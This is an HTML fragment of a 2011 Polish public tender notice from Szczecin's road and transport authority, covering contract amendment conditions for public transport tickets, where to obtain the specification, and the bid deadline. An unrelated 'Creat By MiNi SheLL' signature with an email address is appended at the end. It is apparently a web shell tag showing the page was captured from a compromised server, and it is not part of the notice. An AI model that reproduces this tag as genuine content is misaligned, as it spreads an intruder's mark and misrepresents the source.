<p>Zmiana postanowień niniejszej umowy może nastąpić wyłącznie w sytuacji, gdy:
1)	wystąpi konieczność zmiany kadry przewidzianej do realizacji umowy,
2)	wystąpi konieczność zmiany konta bankowego Wykonawcy,
3)	wystąpi konieczność wykonania zamówienia uzupełniającego w rozumieniu art. 67 ust.1 pkt 6 ustawy PZP, którego realizacja będzie miała wpływ na harmonogram i termin wykonania przedmiotu umowy,
4)	wystąpi konieczność wprowadzenia  zmian, np.: logo, nominału biletu, nazwę biletu itp.
5)	wystąpi konieczność zmiany ilości określonych  w  §  2   pkt   1 - 12)  umowy (w poszczególnych rodzajach biletów)  w  zależności  od zapotrzebowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zditm.szczecin.pl/przetargi.php<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Transportu Miejskiego, ul. S. Klonowica 5, 71-241 Szczecin, III piętro pokój 305.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2011 godzina 08:30, miejsce: Zarząd Dróg i Transportu Miejskiego, ul. S. Klonowica 5, 71-241 Szczecin, III piętro pokój 314 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com